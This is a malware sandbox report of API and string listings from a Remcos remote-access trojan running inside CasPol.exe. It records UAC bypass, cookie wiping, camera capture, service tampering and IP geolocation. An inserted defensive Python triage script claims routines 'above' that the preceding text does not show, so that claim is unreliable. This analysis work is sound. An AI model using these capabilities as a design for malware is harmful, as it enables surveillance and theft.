                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32 ref: 00412554
                                                                                                                • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                              • API String ID: 1133728706-4073444585
                                                                                                              • Opcode ID: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                                                                              • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                              • Opcode Fuzzy Hash: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
                                                                                                              • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
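Three of the listings above are the ones an analyst hunts for in a dump like this: the clipboard routine (GetClipboardData, then a subcall into send.WS2_32), the registry-walking routine (RegEnumKeyExW, again feeding the same send subcall at 00404468), and the cookie-clearing routine that reads the User Shell Folders key but never touches the socket. As an added example, not code from the Joe Sandbox report or from Joe Security's tooling, the Python below parses listings in exactly this layout and flags a function only when a collection API and a send API appear together; the capability tables are the example's own assumption, and the embedded sample is constructed from the three blocks on this page, trimmed to the fields the parser uses.

```python
"""Triage Joe Sandbox 'IDA Plugin' function listings for collection-plus-exfil pairs.

Added example, not part of the Joe Sandbox report or of Joe Security's tooling. It parses the
per-function 'APIs' bullets (name.MODULE(args), ref: addr, including 'Part of subcall function'
lines) plus the 'String ID' summary, and flags functions that combine a data-collection API
with a socket send. The capability tables below are this example's own assumption.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

BULLET = "\u2022"  # the report's bullet character
API_RE = re.compile(
    r"^\s*" + BULLET + r"\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\S+?)\.(?P<mod>[A-Z0-9_]+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)")
# Assumed (deliberately small) classification: APIs that gather data, APIs that ship it.
COLLECT = {"GetClipboardData": "clipboard_read", "InternetReadFile": "http_read",
           "RegEnumKeyExW": "registry_enum", "RegQueryInfoKeyW": "registry_enum",
           "RegQueryValueExA": "registry_read", "RegQueryValueExW": "registry_read"}
EXFIL = {"send": "socket_send", "sendto": "socket_send", "WSASend": "socket_send"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]  # callee address when the report lists the API under a subcall

@dataclass
class FunctionBlock:
    opcode_id: str = ""
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split report text into functions; every listing ends at its 'Instruction Fuzzy Hash' line."""
    blocks, cur = [], FunctionBlock()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"].upper(), m["sub"]))
            continue
        s = line.strip().lstrip(BULLET).strip()
        if s.startswith("Opcode ID:"):
            cur.opcode_id = s.split(":", 1)[1].strip()
        elif s.startswith("String ID:"):
            body = s.split(":", 1)[1].strip()
            cur.strings = body.split("$") if body else []
        elif s.startswith("Instruction Fuzzy Hash:"):
            blocks.append(cur)
            cur = FunctionBlock()
    return blocks

def triage(blocks: List[FunctionBlock]) -> List[dict]:
    """One finding per function; subcall APIs count for the caller, as the report attributes them."""
    out = []
    for b in blocks:
        names = {a.name for a in b.apis}
        caps = sorted({COLLECT[n] for n in names if n in COLLECT} |
                      {EXFIL[n] for n in names if n in EXFIL})
        out.append({"opcode_id": b.opcode_id, "capabilities": caps,
                    "flag": any(n in COLLECT for n in names) and any(n in EXFIL for n in names),
                    # two/three-character 'strings' such as DG are address residue, not text
                    "strings": [s for s in b.strings if len(s) >= 4]})
    return out

# Constructed sample: three listings from this report's CasPol.exe dump, trimmed to the fields used.
SAMPLE = """\
APIs
• GetClipboardData.USER32 ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• String ID:
• Opcode ID: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
• Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
APIs
• RegOpenKeyExW.ADVAPI32 ref: 00412CC1
  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00412A4C
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• String ID: TUFTUF$>G$DG$DG
• Opcode ID: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
• Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
APIs
  • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32 ref: 00412554
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
• PathFileExistsA.SHLWAPI(?), ref: 0040B779
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders
• Opcode ID: b2ac8dee5e5069ae19a2430ed362db1d01aada1bcbcc6095e396115e7a02ca7f
• Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
"""

if __name__ == "__main__":
    for f in triage(parse_blocks(SAMPLE)):
        print("FLAG" if f["flag"] else "    ", f["opcode_id"][:12], f["capabilities"], f["strings"])
```

Fed the full text export of a report, the script prints one line per function and marks the clipboard and registry routines while leaving the cookie-clearing routine unflagged, which is the intended discrimination: a registry read on its own is noise, a registry read that reaches send.WS2_32 is the collector to reverse first. The Opcode ID is kept as the function key because, unlike the ref addresses, it is what Joe Sandbox uses to correlate the same function across samples.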
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                                                                              • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                              • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                                                                              • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                              APIs
                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                              • int.LIBCPMT ref: 0040FC0F
                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                              • String ID: P[G
                                                                                                              • API String ID: 2536120697-571123470
                                                                                                              • Opcode ID: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                                                              • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                              • Opcode Fuzzy Hash: 31ce6fe8dfd7390de1d64992225249e105d572f1378bab70f4a441faf385e78a
                                                                                                              • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                              APIs
                                                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                              Strings
                                                                                                              • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                              • String ID: http://geoplugin.net/json.gp
                                                                                                              • API String ID: 3121278467-91888290
                                                                                                              • Opcode ID: 8a2722a77a721669593b0367f0fdf2e0f92c97aa65a2f702c1d2453de3b58543
                                                                                                              • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                              • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                              APIs
                                                                                                                • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                              • _free.LIBCMT ref: 0044FD29
                                                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                              • _free.LIBCMT ref: 0044FD34
                                                                                                              • _free.LIBCMT ref: 0044FD3F
                                                                                                              • _free.LIBCMT ref: 0044FD93
                                                                                                              • _free.LIBCMT ref: 0044FD9E
                                                                                                              • _free.LIBCMT ref: 0044FDA9
                                                                                                              • _free.LIBCMT ref: 0044FDB4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                              • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                              • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32 ref: 00412554
                                                                                                                • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                                                                              • StrToIntA.SHLWAPI(00000000), ref: 0041A4D9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                              • API String ID: 1866151309-2070987746
                                                                                                              • Opcode ID: 55ad628b9ffecf6fc05846b0b449cc9ef91119f19e10ab231a0cee3385cadad7
                                                                                                              • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                              • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
                                                                                                              APIs
                                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 00406835
                                                                                                                • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                              • CoUninitialize.OLE32 ref: 0040688E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                              • API String ID: 3851391207-2637227304
                                                                                                              • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                              • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                              • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                              APIs
                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                              • int.LIBCPMT ref: 0040FEF2
                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                              • String ID: H]G
                                                                                                              • API String ID: 2536120697-1717957184
                                                                                                              • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                                                                              • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                              • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                              APIs
                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                              • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                              Strings
                                                                                                              • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                              • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                              • UserProfile, xrefs: 0040B2B4
                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                              • API String ID: 2018770650-304995407
                                                                                                              • Opcode ID: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                                                                              • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                              • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                              APIs
                                                                                                              • AllocConsole.KERNEL32 ref: 0041BEB9
                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: Console$AllocOutputShowWindow
                                                                                                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                              • API String ID: 2425139147-2527699604
                                                                                                              • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                              • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                              • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID:
                                                                                                              • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
                                                                                                              • API String ID: 0-3292752334
                                                                                                              • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                                              • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                              • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                              APIs
                                                                                                              • __allrem.LIBCMT ref: 00439789
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                              • __allrem.LIBCMT ref: 004397BC
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                              • __allrem.LIBCMT ref: 004397F1
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                              • String ID:
                                                                                                              • API String ID: 1992179935-0
                                                                                                              • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                                                                              • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                              • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              • API ID: __cftoe
                                                                                                              • String ID:
                                                                                                              • API String ID: 4189289331-0
                                                                                                              • Opcode ID: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                                                                              • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                              • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __freea$__alloca_probe_16
                                                                                                              • String ID: a/p$am/pm
APIs
• Sleep.KERNEL32(00000000), ref: 00403E8A
  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ChangeConfigManager
• String ID:
APIs
• GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
• SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
APIs
• GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
• _free.LIBCMT ref: 00446EF6
• _free.LIBCMT ref: 00446F1E
• SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
• SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
• _abort.LIBCMT ref: 00446F3D
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
APIs
• RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00412A4C
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710), ref: 00412AED
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Enum$InfoQueryValue
• String ID: [regsplt]$DG
APIs
  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
• __Init_thread_footer.LIBCMT ref: 0040AEA7
